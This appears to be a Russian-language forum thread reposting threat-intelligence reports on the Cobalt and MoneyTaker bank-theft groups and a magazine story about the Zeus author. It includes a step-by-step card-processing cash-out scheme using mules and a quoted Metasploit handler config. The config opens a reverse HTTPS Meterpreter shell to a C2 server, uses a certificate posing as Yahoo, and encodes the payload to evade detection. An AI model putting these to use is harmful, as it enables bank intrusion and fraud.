                      В более раннем исследовании 2016 года мы связали появление Cobalt с прекращением существования другой группы – Buhtrap. Между последней атакой Buhtrap и первой атакой Cobalt в России прошло три месяца. Именно в этот период группа Cobalt подготовила свою инфраструктуру и совершила хищения через SWIFT в банках Гонконга и Украины. О том, что к атакам на SWIFT причастны именно Cobalt, говорит уникальный загрузчик (stager), который использовали только они. Однако для Cobalt образца 2016 года эти атаки были неожиданно сложными технически. Кроме того, сам процесс обналичивания денег, выведенных через SWIFT, всегда являлся нетривиальной задачей.
                      Эти факты указывали на вероятное наличие сообщников. Связь с группой Anunak удалось найти только спустя 1.5 года (в 2017 году), когда в одном из сложных инцидентов в ходе мероприятий по реагированию нами был обнаружен уникальный SSH-бэкдор, который использовался группой Anunak в 2014-м году.

                      Собственная безопасность
                      Первым большим самостоятельным успехом Cobalt стал First Bank на Тайване. В ходе атаки на банкоматы хакерам удалось похитить 2,18 млн долларов. После этого преступники стали действовать осторожнее, переключившись на более безопасные атаки, связанные с карточным процессингом. Параллельно группа начинает дорабатывать свои инструменты, в частности, эксплойты и stager’ы для того, чтобы усложнить их атрибуцию и обнаружение.

                      В сентябре 2016 они сумели получить доступ в один из банков Казахстана. Процесс подготовки атаки и изучения инфраструктуры банка занял 2 месяца. В ноябре они успешно похитили около 600 тысяч долларов через карточный процессинг, после чего поставили такие атаки на поток. С этого месяца именно процессинг стал основной целью Cobalt в банках разных стран. Это позволяло хакерам работать быстрее и безопаснее: после задержаний мулов (лиц, привлекаемых для обналичивания) в Тайване, Румынии, России безопасность стала для них приоритетом.

                      Технологическая гонка
                      2017-й стал годом технологического прорыва группы. Вероятнее всего, Cobalt нашли команду разработчиков, которые на постоянной основе выполняли их заказы, создавая новые инструменты и дорабатывая эксплойты в целях затруднения обнаружения средствами защиты. Новый ресурс позволил им быть оперативнее: при появлении PoC для 1-day эксплойтов группа Cobalt в течение нескольких часов начинала использовать ее модифицированную версию.

                      Модернизация технологий и усовершенствование тактики позволили Cobalt еще успешнее атаковать свои цели внутри банков – SWIFT, карточный процессинг, платежные шлюзы. В этом же году Cobalt устанавливает персональный «рекорд», сделав попытку вывести максимальную для них сумму 25 млн. евро из одного европейского банка.

                      Среди новых и модернизированных программ в 2017, используемых Cobalt:
                      Petya. Известный во всем мире вирус-шифровальщик был использован Cobalt в ходе взлома российского банка. Хакеры попытались похитить деньги через карточный процессинг, но после неудачной попытки воспользовались модифицированной версией шифровальщика Petya
                      – «PetrWrap», которую они же и разработали. Низкоуровневая модификация была исполнена на С, что свидетельствует о высоком уровне технической подготовки автора. В результате они вывели из строя сеть этого небольшого банка, что значительно затруднило реагирование.
                      JS-бэкдор. В мае они начали тестирование нового инструмента — библиотеки формата PE (DLL), выполнявшей роль разведывательного модуля. Однако этот инструмент так и не был использован группой, и они перешли к тестированию нового JS-бэкдора, который должен был выполнять роль развед-модуля и усложнять процесс их обнаружения и исследования. Данный бэкдор впервые был использован в атаках через компрометацию серверов американского интегратора с высоким качеством составления фишинговых писем и приложением реальных отчетов из системы SWIFT. Программа использовалась в атаках не только по странам СНГ и восточной Европы, но и для атак англоговорящих компаний.
                      InfoStealer. В сентябре Cobalt реализовала функциональность JS бэкдора в исполняемом файле, но без возможности загрузки и запуска других программ. В этом InfoStealer была указана версия 0.2. Он полностью memory-hosted и не оставляет следов в файловой системе. Данная программа использовалась в атаках на СМИ, разработчиков ПО, страховые компании с целью использования их инфраструктуры для дальнейших атак на банки
                      Recon Backdoor (CobInt). В декабре они начали использовать новый Java-загрузчик, генерируемый фреймворком CobaltStrike, но с уникальным payload’ом, который догружает Recon бэкдор Coblnt. Бэкдор в виде команд от сервера получает модули на исполнение. Подобное усложнение вектора атаки очень похоже на тактику используемую в целенаправленных атаках профессиональными прогосударственными атакующими. Похожим образом в свое время работал Lurk.

                      Атака через посредника

                      Важным изменением тактических действий Cobalt стало смещение в сторону непрямых
                      атак. В феврале 2017 года эксперты Group-IB фиксируют успешный взлом системного интегратора, которого Сobalt использует как «посредника» для проведения атак на компании в России, Казахстане, Молдавии, а также их представительства в других странах. В течение последующих 9 месяцев они получат доступ минимум в 4 аналогичных компании: по одной в Украине и США, и двум компаниям в России.
                      Нетипичные объекты для атак
                      В марте 2017-го они начали готовить атаки на компании, предоставляющие электронные кошельки и терминалы оплаты. Уже в апреле они изучили новую схему и создали уникальную программы для автоматического формирования мошеннических платежей через платежные шлюзы. В сентябре они проводят первую атаку на компанию разработчика электронных кошельков и похищают деньги через платежный шлюз. Именно в этом инциденте впервые обнаружены явные следы группы Anunak. Позже группа начинает атаковать еще более нетипичные цели – страховые агентства и СМИ. Они захватывают контроль над почтовыми серверами или учетными записями жертв для последующего использования их инфраструктуры в атаках на финансовые организации.

                      Cobalt: перезагрузка
                      В 2018-й год Cobalt вошла на пике формы – как с точки зрения технологического, так и ресурсного обеспечения. И здесь случилось непредвиденное: 26 марта 2018 года в СМИ появилась информация о том, что в Испании был задержан лидер Cobalt. Скорее всего, он был арестован раньше, это не остановило других участников этой группы. Они продолжили атаковать финансовые учреждения, хотя и снизили свою активность в России и СНГ, временно сосредоточившись на других регионах. Примечательно, что зафиксированные в марте фишинговые рассылки всегда приходили от имени американских компаний, например, IBM, Verifon, Spamhaus.

                      7-10 марта письма рассылались с доменов ibm-cert.com, ibm-warning.com, ibm-notice.com.
                      15 марта была зафиксирована новая рассылка — в качестве сервера управления использовался домен dns-verifon.com, эксплуатировавший бренд компании VeriFon – круп-
                      нейшего вендора POS-терминалов.
                      26 марта письма рассылали от имени компании Spamhaus, некоммерческой организации, специализирующейся на борьбе со спамом. Для этой рассылки атакующие зарегистрировали очень похожий домен spamhuas.com.
                      3 апреля были зафиксированы рассылки со скомпрометированной почтового сервера шведской компании.

                      Эксперты Group-IB зафиксировали новую целевую атаку Cobalt, направленную на банки
                      России, СНГ и предположительно на иностранные организации. Впервые фишинговые письма направляются от имени крупного антивирусного вендора. Учитывая технологическое развитие группы, а также тот факт, что после ареста главаря, на свободе до сих пор остаются другие ее участники, мы не исключаем, что члены Cobalt в ближайшее время вольются в другие группы или будут возрождены в виде условного Cobalt 2.0. В любом случае, их рано списывать со счетов.

                      Атаки на карточный процессинг
                      В сентябре 2016 года группа Cobalt получила доступ в один из банков Казахстана и начала подготовку к новому для них типу хищений – через карточный процессинг. Процесс изучения занял 2 месяца, и в ноябре они успешно похитили около $600 тыс. Уже в 2017 году, используя этот метод хищения, хакеры Cobalt установили абсолютный «рекорд» и предприняли попытку похитить 25 млн евро.
                      Cobalt выучили важный урок: в атаках с получением доступа к банкоматам, хищение проходило в той же стране, где находился атакованный банк, это приводило к тому, что мулов, занимающихся снятием наличных, часто задерживали. Их безопасность стала для Cobalt важным приоритетом после их задержаний в Тайване, Румынии и России. Атаки через карточный процессинг существенно снижали риск повторных арестов, за счет следующих факторов:
                      • Нет необходимости в сложной схеме отмывания денег: атакующие сразу снимали чистый кэш.
                      • Для того чтобы обеспечить обналичивание, достаточно оформить или купить несколько карт.
                      • Совершая атаку в одной стране и снимая деньги в другой, хакеры выигрывали время, поскольку служба безопасности банка не могла оперативно связаться с полицией и получить записи с камер видеонаблюдения.

                      Новая значительно менее рискованная и эффективная схема Cobalt была очень проста:
                      • После получения контроля над банковской сетью атакующие проверяли, есть ли возможность подключаться к системе управления карточным процессингом.
                      • Легально открывали или покупали доступные на рынке карты банка, в который они получили доступ. Обычно для хищения использовалось около 30 карт.
                      • Мулы с предварительно открытыми картами уезжали в другую страну, где ждали начала операции.
                      • Атакующие, используя доступ к карточному процессингу, убирали или увеличивали лимиты на снятие наличных для карт мулов.
                      • Убирали овердрафт лимиты, что позволяло уходить в минус даже по дебетовым картам.
                      • Мулы, используя эти карты, снимали наличные в одном банкомате, потом переходили к другому и так далее.

                      Пошаговая хронология атаки на карточный процессинг

                      1. Заражение:
                      • 07.09.2016 осуществляется массовая рассылка фишинговых писем с вредоносным вложением для загрузки CobaltStrike на множество электронных почтовых адресов, среди которых – адреса работников банка.
                      • 08.09.2016 в 08:38:45 на рабочей станции сотрудника банка закрепляется вредоносное ПО, и начинается фаза распространения CobaltStrike по банковской IT-инфраструктуре.
                      • 09.09.2016 с различных рабочих станций осуществляется загрузка CobaltStrike, после чего злоумышленники получают скрытый канал связи для мониторинга IT-инфраструктуры банка и перехвата управления над любыми её активными узлами.
                      • С 09.09.2016 по 10.11.2016 посредством инструментария Cobalt Strike злоумышленники собирают данные о доменных и локальных учётных записях пользователей.

                      2. Разведка:
                      • С 10.11.2016 по 30.11.2016 посредством CobaltStrike и скомпрометированных учетных записей пользователей злоумышленники исследуют и изучают систему карточного процессинга.
                      • Осуществляются многократные попытки подключения к системе с целью разработки нескольких альтернативных маршрутов доступа к управляющему модулю.
                      • Исследуются возможности системы с целью определения специфических настроек карточных счетов, установки кредитных лимитов, изменения ограничений по обналичиванию средств.

                      3. Подготовка дропов:

                      • C 04.11.2016 по 12.12.2016 злоумышленники легитимным способом получают мультивалютные карты в четырех различных филиалах банка Казахстана.
                      • Большая часть выпущенных карт вывозится из Казахстана в Российскую Федерацию, Латвию, Эстонию, Францию, Австрию, Германию, Нидерланды и Бельгию.

                      4. Хищение:
                      • 18.12.2016 реализуется типовая дроп-схема. Злоумышленники, у которых имелся несанкционированный доступ к IT-инфраструктуре банка, используя скомпрометированные учётные записи, подключаются к платежной системе, устанавливают кредитные лимиты
                      на карты дропов и снимают лимиты на обналичивание денежных средств для данных карт.
                      • 18.12.2016 – 19.12.2016 заранее подготовленная группа дропов по команде дроповодов осуществляет обналичивание денежных средств по установленным кредитным лимитам.
                      • 19.12.2016 работники банка обнаруживают нелегитимную установку кредитных лимитов и в 11:30 все карты и карточные счета.
                      • 20.12.2016 фиксируется последняя попытка дропов снять денежные средства.
                      Телега - @trener_dm
                      Ссылка https://t.me/trener_dm

                      Комментарий


                      • #12
                        Тема конечно очень старая и многим известная. Но не смог обойти её стороной.
                        ! Статья журналистская, а не технический отчет специалистов. Так что сколько в ней правды, а сколько авторских домыслов неизвестно.


                        Охота за российским хакером

                        Как создатель вируса Zeus Евгений Богачёв из России крал миллионы долларов и долгие годы скрывался от агентов ФБР.



                        30 декабря 2016 года президент США Барак Обама ввёл санкции против ФСБ, ГРУ, нескольких технологичных компаний и двух хакеров, среди которых был и Евгений Богачёв. Сейчас мужчина скрывается, и о его деятельности ничего не известно, но ещё несколько лет назад ФБР и лучшие IT-специалисты по кибербезопасности разыскивали этого человека по всему миру.
                        Богачёва считают создателем знаменитого вируса ZeuS, поработившего сотни тысяч компьютеров по всему миру, и основателем элитной хакерской группировки, укравшей более 100 миллионов долларов с банковских счетов. За его голову правительством США назначена награда в 3 миллиона долларов. Историю деятельности Богачёва и борьбу со спецслужбами рассказал журналист издания Wired Гаретт Графф (Garrett M. Graff).

                        Становление «Зевса»
                        Весной 2009 года специальный агент ФБР Джеймс Крейг (James Craig) приехал в бюро в Омахе, штате Небраска. Он был бывшим морпехом и зарекомендовал себя как хороший IT-специалист, поэтому его назначили следователем по делу о крупной краже средств через интернет. В мае 2009 года у дочерней организации американской компании First Data украли 450 тысяч долларов. Чуть позже у клиентов первого национального банка Омахи украли 100 тысяч долларов.
                        Крейга смутило, что в обоих случаях кражи провели с IP-адресов самих жертв при помощи их логинов и паролей. После проверки компьютеров агент ФБР обнаружил, что оба устройства заражены одним вирусом — трояном «Зевс».
                        С помощью специалистов по кибербезопасности Крейг выяснил, что этот вирус впервые появился в 2006 году. Однако существуют версии, что впервые ботнет разошелся в 2007 году. Так или иначе, Zeus приобрёл огромную популярность у хакеров, а эксперты по безопасности описывали «Зевса» как удобный, эффективный и универсальный технологический шедевр. Крейг попытался найти автора вируса, однако узнал лишь никнеймы хакера: Slavik и lucky12345
                        Продолжив расследование, Крейг изучил принцип работы «Зевса». Он заражал компьютер через поддельные электронные письма и фальшивые интернет-уведомления, которые при нажатии обманом загружали в систему заражённый файл. Как только «Зевс» попадал в компьютер, он крал логины, пароли и PIN-коды пользователя на сайтах, используя кейлоггер, то есть записывая нажатия клавиш. Вирус мог даже менять формы входа в систему, получая доступ к ответам на тайные вопросы вроде девичьей фамилии матери или номера страхования. После этого компьютер мог незаметно для пользователя рассылать спам, распространяя вирус дальше.
                        До начала расследования Крейга Slavik часто появлялся на хакерских форумах и продвигал свой вирус. Однако в 2010 году он объявил об «уходе» и напоследок показал расширенную версию «Зевса» с возможностью привязать программу к своему владельцу. За копию программы Slavik просил 10 тысяч долларов. Такие затраты могли себе позволить не все хакеры, но и автор «Зевса» больше не хотел мыслить мелко — у него были большие планы.
                        Ещё летом 2009 года вместе с доверенными хакерами Slavik создал группировку элитных киберпреступников. Для оперативного общения он разработал модернизированную версию «Зевса» со встроенным мессенджером Jabber Zeus. Благодаря этому команда могла скрытно и оперативно общаться и координировать взломы банковских счетов. Новая тактика Slavikа предполагала, что главный упор будет сделан на кражу личных данных у бухгалтеров и менеджеров крупных компаний, имеющих доступ к финансовым системам.
                        Параллельно с этим Крейг проводил расследование, но, как он позже признался журналисту Wired, даже не подозревал о масштабах угрозы. И только когда десятки американских банков начали жаловаться на электронные кражи годичной выручки агент ФБР понял, что столкнулся с профессиональной хакерской группировкой.

                        Расследование спецслужб
                        В сентябре 2009 года Крейг вместе с несколькими IT-специалистами обнаружил в Нью-Йорке сервер, связанный с системой Jabber Zeus. Агент ФБР добился ордера на обыск и перезаписал трафик сервера на жёсткий диск. Когда инженер федеральной службы увидел содержимое данных, он на несколько минут потерял дар речи. Оказалось, что Крейг заполучил хакерскую переписку по мессенджеру Jabber с адресами из России и Украины.
                        Следующие несколько месяцев инженер американской компании по кибербезопасности Mandiant и сотрудники ФБР расшифровывали переписку. Процесс затруднился из-за хакерского сленга, который пришлось анализировать американским лингвистам.
                        В расшифрованных данных хакеры обсуждали взломанные компании, и благодаря этому Крейг обзвонил руководство организаций. Он сообщил, что их деньги пропали из-за опасного компьютерного вируса. К этому моменту бухгалтеров нескольких фирм уже уволили по подозрению в кражах.
                        Однако успешная расшифровка данных слабо продвинула дальнейшее расследование. Только под конец 2009 года Крейг выяснил, как хакерская группировка умудряется скрытно переводить огромные суммы денег.
                        Всё началось с рассказа трёх уроженок Казахстана сотрудникам ФБР. Они якобы приехали в Нью-Йорк в поисках работы, и однажды неизвестный предложил им поучаствовать в странной схеме. Их привозили на машине к банку, после чего женщины открывали там счёт и сообщали сотрудникам, что приехали в страну на лето по учёбе.
                        Несколько дней спустя мужчина привозил женщин, и они снимали деньги, поступившие на счёт. За эту работу им платили небольшой процент, а остальное передавали рекрутеру. Когда об этой истории узнал Крейг, он понял — женщин использовали как «денежных мулов». Их работа заключается в передаче денег хакерской группировке Slavik. Вскоре ФБР выяснили, что схема «мулов» работала в США, Румынии, Чехии, Великобритании, Украине и России.
                        Когда спецслужбы США попросили банки сообщать о людях, которые напоминают таких «мулов», агентам ФБР вскоре пришлось общаться с десятками людей. В основном это были студенты и иммигранты, снимающие со счетов по девять тысяч долларов, чтобы не привлекать внимания.
                        Летом 2010 года сотрудники службы арестовали двух уроженцев Молдавии, предлагающих работу «мулом». Параллельно с этим ФБР совместно с Минюстом определил, что трое лидеров хакерской группировки Slavik скрываются на Украине в Донецке.
                        Осенью 2010 года ФБР договорилось с украинской службой безопасности (СБУ) о совместном рейде к одному из лидеров хакеров Ивану Клепикову. Когда спецагенты пришли в квартиру в старом советском доме и начали обыск, хакер спокойно наблюдал за процессом. На кухне его жена держала на руках ребёнка и смеялась вместе с агентами СБУ. Крейг забрал больше 20 терабайтов информации с десятков жёстких дисков Клепикова и вернулся в США.
                        Параллельно с этим агенты арестовали 39 рекрутеров «мулов» в четырёх странах. Этого хватило, чтобы нарушить хакерскую систему отмывания денег. Однако Крейг разочаровался — ФБР нисколько не приблизились к поимке руководителя группировки Slavik. Спецслужбы знали наверняка только одно: у него есть жена. После рейда спецслужб на Украине лидер хакеров и автор Jabber Zeus исчез, и Крейга перевели на другое расследование.

                        Новый вирус и провальная атака
                        В 2011 году небольшое сообщество по кибербезопаности заметило новую разновидность «Зевса» с модернизированной системой бот-нета. В первоначальных версиях вируса заражённые компьютеры управлялись через один командный центр, что делало всю систему уязвимой. Ведь если спецслужбы обнаружат этот сервис, они смогут одним ударом отключить всю систему.
                        В новой версии «Зевса», ставшей известной как GameOver Zeus, заражённые компьютеры постоянно хранили и обновляли список других инфицированных. Это делалось на тот случай, если вирус на устройстве зафиксирует попытку перехватить его связь с командным центром. В такой момент заражённый компьютер мог переключиться на другой командный сервис и сбить с толку спецслужбы.
                        В ФБР предполагали, что GameOver Zeus использовала новая группировка хакеров «Бизнес-клуб», которую Slavik основал вместо рассеянной Jabber Zeus. Сначала GameOver крал банковские данные с помощью заражённого компьютера, затем выкачивал деньги и переводил на подконтрольные хакерам счета. Параллельно с этим вирус на компьютерах блокировал доступ к банковскому сервису, чтобы не дать людям проверить свои банковские счета до тех пор, пока деньги окончательно не перейдут злоумышленникам.
                        Новая система работала отлично. В ноябре 2012 года «Бизнес-клуб» украл почти 7 миллионов долларов у американской компании. В ФБР больше не могли захватить рекрутеров и прервать процесс поступления денег. Все «мулы» работали в городах дальневосточного Китая недалеко от Владивостока.
                        Но успех со взломами банковских счетов с помощью нового вируса оказался лишь началом новой стратегии Slavik. В октябре 2013 года группировка распространила в интернете вирус CryptoLocker, шифрующий файлы на инфицированных компьютерах.

                        В среднем за разблокировку хакеры требовали от 300 до 500 долларов. Деньги они принимали только в биткоинах, чтобы их не отследили спецслужбы. С помощью CryptoLocker хакеры смогли монетизировать тысячи компьютеров, которые попали под действия вируса, но не содержали полезной информации. Эта идея не была новой, но именно шифровальщик «Бизнес-клуба» развил её до международных масштабов.
                        С 2011 по 2013 года специалисты по кибербезопасности три раза пробовали подорвать работу серверов «Бизнес-клуба» и вируса GameOverZeus. Однако каждый раз хакерская группировка легко отбивала атаки. Единственным результатом таких действий стало то, что Slavik укрепил защиту на случай новых нападений.
                        Это, вероятно, и стало причиной провала следующей атаки. Её спланировала небольшая команда профессиональных IT-специалистов, борющихся с вирусами. Одним из экспертов группы был уроженец Германии Тильманн Вернер (Tillmann Werner) — работник компании CrowdStrike.
                        В феврале 2012 года IT-специалист полностью прервал работу вируса Kelihos, выросшего на рассылках спама с виагрой. Для Вернера это была большая победа, но он знал — Kelihos и близко не стоял с GameOver Zeus. Специалист видел, как легко Slavik отбил атаки на свои серверы, и учёл этот опыт.
                        Почти год Вернер и команда европейских специалистов работала над планом по «штурму» серверов GameOver Zeus. Идея заключалась в том, чтобы централизовать весь трафик вируса, исходящий из заражённых компьютеров, а затем направить его на сервер, контролируемый группой Вернера. Таким образом они надеялись отследить источник заражения — компьютер Slavik.
                        В январе 2013 года IT-специалисты атаковали серверы и быстро собрали в кучу 99% трафика инфицированных вирусом компьютеров. Однако оставшийся процент контролировал командный центр хакера, и все заражённые компьютеры были связаны с этим сервером. Через две недели Slavik снова контролировал инфицированные компьютеры. План, который европейские специалисты готовили девять месяцев, провалился.

                        Финальное столкновение
                        За последние десять лет отдел ФБР в Питтсбурге приобрёл статус самого мощного государственного аппарата по борьбе с киберпреступностью. Главную роль в этом сыграл агент Кит Муларски (Keith Mularsky). Он устроился в ФБР в 1998 году, и следующие семь лет расследовал дела по шпионажу и терроризму. Муларски не разбирался в компьютерах, однако в 2005 году перешёл в молодой отдел по киберзащите в Питтсбурге.


                        Следующие два года Муларски работал под прикрытием, втираясь в доверие к руководству киберпреступной группировки DarkMarket. Хакерская организация прославилась кражами и продажей личных данных и номеров кредитных карт, и долгие годы оставалась неуловимой для ФБР.
                        Благодаря Муларски, ставшим администратором DarkMarket, в 2008 году спецслужбы арестовали по связям с группировкой 60 человек. После этого незаконный сайт закрылся, а отдел по борьбе с интернет-преступностью получил крупное госфинансирование. Поэтому когда операция европейских IT-специалистов по борьбе со Slavik провалилась, они попросили помощи у Муларски.
                        Обычно ФБР отказывается сотрудничать с другими организациями, однако агентству нужна была помощь. Поэтому ведущий расследование Slavik Муларски пригласил в команду европейских IT-специалистов, которые некогда штурмовали серверы «Зевса». Они знали принципы работы системы и, как решил Муларски, смогут помочь.
                        Объединённая команда по кибербезопасности составила вдумчивый план победы над Slavik и его вирусом. Для начала сотрудники ФБР должны были выяснить настоящее имя хакера, чтобы составить против него судебное дело. Затем европейские программисты вновь атаковали бы заражённые компьютеры и попробовали централизовать их трафик. Если бы это удалось, следователи получили ордеры на изъятие серверов. После этого специалисты планировали выпустить обновление, которое «вылечит» инфицированные компьютеры.
                        В начале 2014 года, через месяц после запуска расследования, команда вышла на след Slavik. Она отследила электронный адрес, на который был зарегистрирован аккаунт хакера на сайте «Бизнес-клуба». При тщательном изучении выяснилось, что следы электронной почты всегда связаны с одним именем в российских социальных сетях — Евгений Богачёв.
                        Следователи поняли, что 30-летний житель России из Анапы и есть тот хакер, который годами всу*** обыгрывал международные спецслужбы и лучших киберспециалистов. На фотографиях Богачёв был с женой и дочерью, а позже программисты выяснили, что первую версию «Зевса» Богачёв написал ещё в 22 года.
                        Однако не определение настоящего имени Slavik стало открытием. Через его почту спецслужбы отследили регулярный трафик по заражённым компьютерам. С их помощью Богачёв искал секретные данные грузинских, турецких и украинских спецслужб, а также собирал информацию об участии России в сирийской войне.
                        После раскрытия этой информации специалисты решили, что программист шпионит для российского правительства. Эта теория стала ещё реальней, когда в марте 2014 года Крым вошёл в состав РФ. После этого частота запросов об украинских секретных данных с инфицированных компьютеров увеличилась.


                        На основе найденной информации команда IT-специалистов и ФБР построили теорию, что после анонса своего «ухода» в 2010 году Богачёв сформировал секретную хакерскую группировку. В какой-то момент на него вышли российские спецслужбы и предложили сделку: шпионить для Кремля в обмен на разрешение продолжить электронные кражи.
                        Собрав эту теорию воедино, ФБР запросила у судов ордеры для захвата серверов GameOver и «Бизнес-клуб». К этому времени европейские специалисты знали систему «Зевса» не хуже, чем Богачёв. Они выяснили, что главные командные центры вируса расположены в Канаде и на Украине, и власти этих стран согласились временно отключить их на время операции.
                        30 мая 2014 года, спустя больше года с начала расследования, спецслужбы Канады, США, Великобритании, Италии, Японии и других стран подготовились к штурму серверов Богачёва. Как только команда получила разрешение, канадские и украинские спецслужбы отключили командные серверы вируса внутри стран, а затем специалисты начали перекачивать трафик заражённых компьютеров на свои серверы. Параллельно программисты блокировали доступ хакерской группировки к сайту «Бизнес-клуба», чтобы помешать скоординировать оборону.
                        За несколько часов усиленной работы инженеры команды едва смогли перехватить сто инфицированных компьютеров — недостаточный урон для вируса, захватившего полмиллиона устройств. Однако с каждым следующим часом специалисты захватывали всё больше заражённых компьютеров.
                        В это же время инженеры зафиксировали активность с IP-адреса Богачёва, пытающегося стабилизировать ситуацию. Он видел, что атаку координировали профессионалы, и не собирался сдаваться. Команда предугадала действия хакера и отключила турецкий прокси-сервер, с которого он работал. К этому моменту борьба продолжалась уже больше десяти часов, и собравшиеся сотрудники ФБР вместе с программистами нервно наблюдали за технологичным столкновением.
                        Через 60 часов после начала операции специалисты объявили о победе. Командные центры Богачёва не работали, а основная часть заражённых компьютеров контролировалась через серверы спецслужб. Следующие несколько недель Богачёв пробовал вернуть контроль над трафиком, но спецслужбы отбили атаки. Через год после поражения российского хакера в США почти полностью прекратились тайные перехваты аккаунтов по принципу «Зевса».
                        В 2015 году власти США объявили награду в 3 миллиона долларов за информацию, которая поможет задержать Богачёва. Это самая большая премия за поимку киберпреступника в американской истории.
                        По данным правительственных источников издания Wired, власти США не считают, что Богачёв по заказу российской стороны участвовал во взломе данных, связанных с выборами в США. Источник заявил, что администрация Барака Обамы включила Богачёва в санкционный список для давления на российское правительство: якобы Кремль может передать хакера американским властям в качестве жеста примирения.
                        По данным спецслужб США, за всё время работы «Зевса» его автор украл как минимум 100 миллионов долларов. Команда ФБР из Питтсбурга продолжает розыск хакера и получает наводки о возможном местонахождении Богачёва. Однако пока неизвестно, что планирует делать сам российский хакер.
                        Телега - @trener_dm
                        Ссылка https://t.me/trener_dm

                        Комментарий


                        • #13
                          MoneyTaker

                          Лично моё мнение, MoneyTaker самая сильная из когда-либо существовавших групп, среди тех, кто работал по коммерции.

                          MoneyTaker (Часть 1.)
                          Полтора года ниже радаров


                          В период с мая 2016 по ноябрь 2017 были атакованы десятки банков и юридических организаций, расположенных в США, Великобритании и России. Один из американских банков был ограблен дважды. Помимо денежных средств, злоумышленники похитили документацию о системах межбанковских платежей, необходимую для подготовки дальнейших атак.
                          Проведя анализ этих инцидентов, использованных инструментов и тактики злоумышленников, мы пришли к выводу, что за этими атаками стоит одна и та же группа, которую мы назвали MoneyTaker. Несмотря на высокую результативность атак, о них до сих пор ничего не писали в прессе.

                          Цели группы MoneyTaker

                          • Всего нам известно об атаках на 20 компаний. 16 из них находятся в США. В большинстве случаев это были небольшие комьюнити банки, в которых злоумышленники атаковали системы карточного процессинга. Средний ущерб от одной атаки составляет 500 тысяч долларов США.
                          • Преступники похитили документацию к системе FedLink компании OceanSystems: этой платформой пользуются 200 банков в Латинской Америке и США. Вероятно, эти банки являются следующей целью группы MoneyTaker.
                          • В России их основной целью является система межбанковских переводов АРМ КБР. Средний размер хищения при такой схеме — 72 млн. рублей, однако часть денег пострадавшим банкам удалось вернуть.
                          Инструменты и тактика
                          Злоумышленники используют как заимствованные, так и собственные инструменты. При атаках они изобретательны и осторожны: используют “одноразовую” инфраструктуру и
                          тщательно уничтожают следы своего присутствия.
                          Проникновение
                          • Для проникновения в корпоративную сеть группа использует легитимный фреймворк Metasploit и PowerShell Empire.
                          • После успешного проникновения хакеры тщательно уничтожают следы того, как именно они получили доступ в сеть. Однако в одном из инцидентов в России нам удалось найти начальную точку проникновения. Доступ в корпоративную сеть банка хакеры получили, атаковав личный (домашний) компьютер администратора этой финансовой организации.
                          Скрытность
                          • Группа использует «бестелесные» программы, которые работают только в оперативной памяти и уничтожаются после перезагрузки.
                          • Чтобы соединения с сервером управления не вызвая подозрений у службы безопасности, злоумышленники использовали SSL-сертификаты с именами известных брендов в названии: Bank of America, Federal Reserve Bank, Microsoft, Yahoo и др.
                          • Серверы для начального заражения являются одноразовыми и меняются сразу после успешного заражения.
                          Программы для атак
                          В группе работают специалисты, достаточно квалифицированные, чтобы оперативно модифицировать используемые ими инструменты. В некоторых случаях они вносили изменения в код программы «на лету» — прямо во время проведения атаки.

                          Сокрытие следов
                          • Сервер, использованный при атаке, сконфигурирован таким образом, чтобы отдавать вредоносную “полезную нагрузку” только по установленному списку IP-адресов, принадлежащих атакованной компании. Так преступники предотвращают попадание «полезной нагрузки» к внешним аналитикам и экспертам.
                          • После каждой группы атак злоумышленники разворачивают новую инфраструктуру.
                          • Использовали программу, которая должна была надежно удалить все компоненты использованных им программ. Однако допустили ошибку в коде, из-за чего данные на атакованном компьютере не удалились, и forensic-эксперты узнали больше о том, что это за группа и как она работает.
                          Взаимосвязь между инцидентами
                          Всего за полтора года нами зафиксировано 20 инцидентов. Поначалу мы разделили эти инциденты на три группы и рассматривали их по-отдельности. Но в ходе глубокого исследования использованной злоумышленниками инфраструктуры, инструментов, тактики, результаты которого представлены в этом отчете, мы сделали вывод, что за всеми инцидентами стоит одна и та же группа – MoneyTaker.

                          Общие признаки между группами 1, 2 и 3
                          • Metasploit для проникновения в корпоративную сеть
                          • SSL сертификаты для защиты трафика между Meterpreter и С2, использующие известные бренды
                          • Русскоговорящие атакующие
                          • Есть свои разработчики, которые создают уникальные инструменты
                          • Компиляция вредоносного кода прямо в момент атаки
                          • Зачистка следов происходит таким образом, чтобы скрыть начальный вектор проникновения
                          Атакующие настраивали перенаправление корпоративной почты на бесплатные почтовые сервисы Yandex.ru и Mail.ru.
                          Общие признаки между группами 2 и 3
                          • Первоначальной целью в России была система АРМ КБР
                          • Использование доменов в зоне .ga
                          • Похожее перемещение в сети.
                          • Общий хостинг в инцидентах 2016 и 2017
                          Общие признаки между группами 1 и 2
                          В обоих группах используется версия UltraVNC 1.1.9.4, которая была доступна еще в 2013 году. Актуальная версия во время атак в России и США была 1.2.0.6.

                          Хронология атак
                          • Самая первая атака, с которой мы связываем эту группу, была проведена весной 2016 года, когда из банка США были похищены деньги в результате получения доступа к системе карточного процессинга STAR, компании FirstData.
                          • В сентябре 2016 года мы зафиксировали несколько атак на банки в России, основной целью была российская система межбанковских переводов АРМ КБР. После успешного хищения в одном из банков, атаки прекратились, как и в случае хищений в США.
                          • В ноябре 2016 злоумышленники развернули новую инфраструктуру, с которой начинают опять атаковать банки в США. Последнюю активность в этой группе атак мы зафиксировали в июне.
                          • В ноябре 2017 зафиксирована новая успешная атака этой группы в России и как и в 2016 году, они похитили деньги через систему межбанковских переводов.

                          ИНФРАСТРУКТУРА ДЛЯ АТАКИ

                          Для проведения целенаправленных атак атакующие используют распределенную инфраструктуру, которую достаточно сложно отслеживать. Достаточно уникальной особенностью является наличие Persistence сервера, который отдает полезную нагрузку
                          только для реальных жертв, чьи IP-адреса добавлены в белый список.

                          Pentest framework server
                          Это уже сервер, с которого осуществляется основная работа. На него они устанавливают легитимные инструменты для проведения тестов на проникновение Metasploit и с него управляют всей атакой.
                          Когда полезная нагрузка (Meterpreter) запускается на скомпрометированном хосте, она инициирует исходящие соединение по SSL Это позволяет избегать обнаружения системами сетевой безопасности. Ниже представлен код, исполненный в панели Metasploit злоумышленником:
                          use exploit/multi/handler
                          set PAYLOAD windows/meterpreter/reverse _ https
                          set LHOST _ c2serverIP _
                          set LPORT 443
                          set HandlerSSLCert /root/.msf4/loot/20161031010327 _
                          default _ 46.228.47.114 _ www.yahoo.com _ pe _ 399345.pem
                          set StagerVerifySSLCert true
                          set EnableStageEncoding true
                          set StageEncoder x86/shikata _ ga _ nai
                          set ExitOnSession false
